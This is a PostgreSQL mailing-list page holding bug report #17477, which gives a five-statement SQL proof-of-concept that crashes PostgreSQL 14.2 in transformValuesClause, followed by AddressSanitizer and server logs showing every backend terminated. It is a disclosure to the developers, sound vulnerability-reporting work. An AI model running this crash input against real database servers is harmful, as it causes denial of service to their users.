BUG #17477: A crash bug in transformValuesClause()
| От | PG Bug reporting form |
|---|---|
| Тема | BUG #17477: A crash bug in transformValuesClause() |
| Дата | |
| Msg-id | 17477-0af3c6ac6b0a6ae0@postgresql.org обсуждение исходный текст |
| Ответы |
Re: BUG #17477: A crash bug in transformValuesClause()
(Masahiko Sawada <sawada.mshk@gmail.com>)
|
| Список | pgsql-bugs |
The following bug has been logged on the website:
Bug reference: 17477
Logged by: Wang Ke
Email address: krking@zju.edu.cn
PostgreSQL version: 14.2
Operating system: Ubuntu 20.04.4 LTS x86_64
Description:
Hello, I found a security bug recently in the latest release version of
Postgresql server(14.2) which causes a segmentation fault caused by a READ
memory access, the detail is as follow:
Reported by:
Wang Ke of Zhejiang University
OS version and name:
Linux ubuntu 5.13.0-40-generic #45~20.04.1-Ubuntu SMP Mon Apr 4 09:38:31 UTC
2022 x86_64 x86_64 x86_64 GNU/Linux
PoC:
CREATE VIEW v0 AS SELECT ;
SELECT INTO GLOBAL TEMP TABLE v0 FROM v0 v1 ;
SET SESSION AUTHORIZATION 'x' ;
CREATE TEMP TABLE v1 ( v2 ) ON COMMIT DELETE ROWS AS VALUES ( 'x' ) , ( 'x'
) , ( 'x' ) ;
SELECT v2 , v2 FROM v0 AS v2 GROUP BY DISTINCT CUBE ( ( VALUES ( ( v2 . * )
) FOR READ ONLY ) ) ;
Crash Log:
2022-05-09 17:00:56.605 CST [245199] LOG: statement: SELECT v2 , v2 FROM v0
AS v2 GROUP BY DISTINCT CUBE ( ( VALUES ( ( v2 . * ) ) FOR READ ONLY ) ) ;
AddressSanitizer:DEADLYSIGNAL
=================================================================
==245199==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000082
(pc 0x55e7ed66ad51 bp 0x7fff1c8b3cd0 sp 0x7fff1c8b3b10 T0)
==245199==The signal is caused by a READ memory access.
==245199==Hint: address points to the zero page.
#0 0x55e7ed66ad50 in transformValuesClause
postgresql-14.2/bld/../src/backend/parser/analyze.c:1512
#1 0x55e7ed66ad50 in transformStmt
postgresql-14.2/bld/../src/backend/parser/analyze.c:321
#2 0x55e7ed670b70 in parse_sub_analyze
postgresql-14.2/bld/../src/backend/parser/analyze.c:198
#3 0x55e7ed6ce7d0 in transformSubLink
postgresql-14.2/bld/../src/backend/parser/parse_expr.c:1797
#4 0x55e7ed6ce7d0 in transformExprRecurse
postgresql-14.2/bld/../src/backend/parser/parse_expr.c:229
#5 0x55e7ed6cab66 in transformExpr
postgresql-14.2/bld/../src/backend/parser/parse_expr.c:104
#6 0x55e7ed6a90b8 in findTargetlistEntrySQL99
postgresql-14.2/bld/../src/backend/parser/parse_clause.c:2071
#7 0x55e7ed6a9639 in findTargetlistEntrySQL92
postgresql-14.2/bld/../src/backend/parser/parse_clause.c:2040
#8 0x55e7ed6b25f1 in transformGroupClauseExpr
postgresql-14.2/bld/../src/backend/parser/parse_clause.c:2264
#9 0x55e7ed6b2aca in transformGroupingSet
postgresql-14.2/bld/../src/backend/parser/parse_clause.c:2449
#10 0x55e7ed6b30fa in transformGroupClause
postgresql-14.2/bld/../src/backend/parser/parse_clause.c:2571
#11 0x55e7ed66b9cd in transformSelectStmt
postgresql-14.2/bld/../src/backend/parser/analyze.c:1299
#12 0x55e7ed66b9cd in transformStmt
postgresql-14.2/bld/../src/backend/parser/analyze.c:323
#13 0x55e7ed672aab in transformOptionalSelectInto
postgresql-14.2/bld/../src/backend/parser/analyze.c:268
#14 0x55e7ed672d21 in transformTopLevelStmt
postgresql-14.2/bld/../src/backend/parser/analyze.c:218
#15 0x55e7ed672e69 in parse_analyze
postgresql-14.2/bld/../src/backend/parser/analyze.c:127
#16 0x55e7edd5dadd in pg_analyze_and_rewrite
postgresql-14.2/bld/../src/backend/tcop/postgres.c:657
#17 0x55e7edd5ecbd in exec_simple_query
postgresql-14.2/bld/../src/backend/tcop/postgres.c:1130
#18 0x55e7edd606f1 in PostgresMain
postgresql-14.2/bld/../src/backend/tcop/postgres.c:4486
#19 0x55e7edbc765d in BackendRun
postgresql-14.2/bld/../src/backend/postmaster/postmaster.c:4530
#20 0x55e7edbc765d in BackendStartup
postgresql-14.2/bld/../src/backend/postmaster/postmaster.c:4252
#21 0x55e7edbc765d in ServerLoop
postgresql-14.2/bld/../src/backend/postmaster/postmaster.c:1745
#22 0x55e7edbca087 in PostmasterMain
postgresql-14.2/bld/../src/backend/postmaster/postmaster.c:1417
#23 0x55e7ed9c046e in main
postgresql-14.2/bld/../src/backend/main/main.c:209
#24 0x7ffaf632f0b2 in __libc_start_main
(/lib/x86_64-linux-gnu/libc.so.6+0x240b2)
#25 0x55e7ed37c5ed in _start (/usr/local/pgsql/bin/postgres+0x38d5ed)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV
postgresql-14.2/bld/../src/backend/parser/analyze.c:1512 in
transformValuesClause
==245199==ABORTING
2022-05-09 17:00:56.655 CST [245188] DEBUG: reaping dead processes
2022-05-09 17:00:56.655 CST [245188] DEBUG: server process (PID 245199)
exited with exit code 1
2022-05-09 17:00:56.655 CST [245188] DETAIL: Failed process was running:
SELECT v2 , v2 FROM v0 AS v2 GROUP BY DISTINCT CUBE ( ( VALUES ( ( v2 . * )
) FOR READ ONLY ) ) ;
2022-05-09 17:00:56.655 CST [245188] LOG: server process (PID 245199)
exited with exit code 1
2022-05-09 17:00:56.655 CST [245188] DETAIL: Failed process was running:
SELECT v2 , v2 FROM v0 AS v2 GROUP BY DISTINCT CUBE ( ( VALUES ( ( v2 . * )
) FOR READ ONLY ) ) ;
2022-05-09 17:00:56.655 CST [245188] LOG: terminating any other active
server processes
2022-05-09 17:00:56.655 CST [245188] DEBUG: sending SIGQUIT to process
245196
2022-05-09 17:00:56.655 CST [245188] DEBUG: sending SIGQUIT to process
245192
2022-05-09 17:00:56.655 CST [245188] DEBUG: sending SIGQUIT to process
245191
2022-05-09 17:00:56.655 CST [245188] DEBUG: sending SIGQUIT to process
245193
2022-05-09 17:00:56.655 CST [245188] DEBUG: sending SIGQUIT to process
245194
2022-05-09 17:00:56.655 CST [245188] DEBUG: sending SIGQUIT to process
245195
2022-05-09 17:00:56.656 CST [245188] DEBUG: forked new backend, pid=245200
socket=9
2022-05-09 17:00:56.656 CST [245195] DEBUG: writing stats file
"pg_stat/global.stat"
2022-05-09 17:00:56.656 CST [245195] DEBUG: writing stats file
"pg_stat/db_32931.stat"
2022-05-09 17:00:56.656 CST [245200] FATAL: the database system is in
recovery mode
2022-05-09 17:00:56.656 CST [245195] DEBUG: removing temporary stats file
"pg_stat_tmp/db_32931.stat"
2022-05-09 17:00:56.656 CST [245195] DEBUG: writing stats file
"pg_stat/db_13012.stat"
2022-05-09 17:00:56.656 CST [245200] DEBUG: shmem_exit(1): 0
before_shmem_exit callbacks to make
2022-05-09 17:00:56.656 CST [245200] DEBUG: shmem_exit(1): 0 on_shmem_exit
callbacks to make
2022-05-09 17:00:56.656 CST [245200] DEBUG: proc_exit(1): 1 callbacks to
make
2022-05-09 17:00:56.656 CST [245200] DEBUG: exit(1)
2022-05-09 17:00:56.656 CST [245195] DEBUG: removing temporary stats file
"pg_stat_tmp/db_13012.stat"
2022-05-09 17:00:56.656 CST [245195] DEBUG: writing stats file
"pg_stat/db_0.stat"
2022-05-09 17:00:56.656 CST [245200] DEBUG: shmem_exit(-1): 0
before_shmem_exit callbacks to make
2022-05-09 17:00:56.656 CST [245200] DEBUG: shmem_exit(-1): 0 on_shmem_exit
callbacks to make
2022-05-09 17:00:56.656 CST [245200] DEBUG: proc_exit(-1): 0 callbacks to
make
2022-05-09 17:00:56.656 CST [245195] DEBUG: removing temporary stats file
"pg_stat_tmp/db_0.stat"
2022-05-09 17:00:56.657 CST [245195] DEBUG: shmem_exit(-1): 0
before_shmem_exit callbacks to make
2022-05-09 17:00:56.657 CST [245195] DEBUG: shmem_exit(-1): 0 on_shmem_exit
callbacks to make
2022-05-09 17:00:56.657 CST [245195] DEBUG: proc_exit(-1): 0 callbacks to
make
2022-05-09 17:00:56.658 CST [245188] DEBUG: reaping dead processes
2022-05-09 17:00:56.658 CST [245188] DEBUG: reaping dead processes
2022-05-09 17:00:56.659 CST [245188] DEBUG: reaping dead processes
2022-05-09 17:00:56.659 CST [245188] DEBUG: server process (PID 245200)
exited with exit code 1
2022-05-09 17:00:56.659 CST [245188] LOG: all server processes terminated;
reinitializing
2022-05-09 17:00:56.660 CST [245188] DEBUG: shmem_exit(1): 0
before_shmem_exit callbacks to make
2022-05-09 17:00:56.660 CST [245188] DEBUG: shmem_exit(1): 5 on_shmem_exit
callbacks to make
2022-05-09 17:00:56.660 CST [245188] DEBUG: cleaning up dynamic shared
memory control segment with ID 3198822830
2022-05-09 17:00:56.661 CST [245188] DEBUG: invoking
IpcMemoryCreate(size=148815872)
2022-05-09 17:00:56.661 CST [245188] DEBUG: mmap(148897792) with
MAP_HUGETLB failed, huge pages disabled: Cannot allocate memory
2022-05-09 17:00:56.666 CST [245188] DEBUG: dynamic shared memory system
will support 674 segments
2022-05-09 17:00:56.667 CST [245188] DEBUG: created dynamic shared memory
control segment 1631943408 (26976 bytes)
2022-05-09 17:00:56.668 CST [245201] LOG: database system was interrupted;
last known up at 2022-05-09 17:00:07 CST
2022-05-09 17:00:56.668 CST [245201] DEBUG: removing all temporary WAL
segments
2022-05-09 17:00:56.679 CST [245201] DEBUG: checkpoint record is at
0/D97D880
2022-05-09 17:00:56.679 CST [245201] DEBUG: redo record is at 0/D97D880;
shutdown true
2022-05-09 17:00:56.679 CST [245201] DEBUG: next transaction ID: 954; next
OID: 73880
2022-05-09 17:00:56.679 CST [245201] DEBUG: next MultiXactId: 1; next
MultiXactOffset: 0
2022-05-09 17:00:56.679 CST [245201] DEBUG: oldest unfrozen transaction ID:
726, in database 1
2022-05-09 17:00:56.679 CST [245201] DEBUG: oldest MultiXactId: 1, in
database 1
2022-05-09 17:00:56.679 CST [245201] DEBUG: commit timestamp Xid
oldest/newest: 0/0
2022-05-09 17:00:56.679 CST [245201] DEBUG: transaction ID wrap limit is
2147484373, limited by database with OID 1
2022-05-09 17:00:56.679 CST [245201] DEBUG: MultiXactId wrap limit is
2147483648, limited by database with OID 1
2022-05-09 17:00:56.679 CST [245201] DEBUG: starting up replication slots
2022-05-09 17:00:56.679 CST [245201] DEBUG: starting up replication origin
progress state
2022-05-09 17:00:56.679 CST [245201] LOG: database system was not properly
shut down; automatic recovery in progress
В списке pgsql-bugs по дате отправления:
Предыдущее
От: Miloš UrbánekДата:
Сообщение: Re: BUG #17476: ERROR: "variable not found in subplan target list" when running SELECT COUNT(*)
Следующее
От: Masahiko SawadaДата:
Сообщение: Re: BUG #17477: A crash bug in transformValuesClause()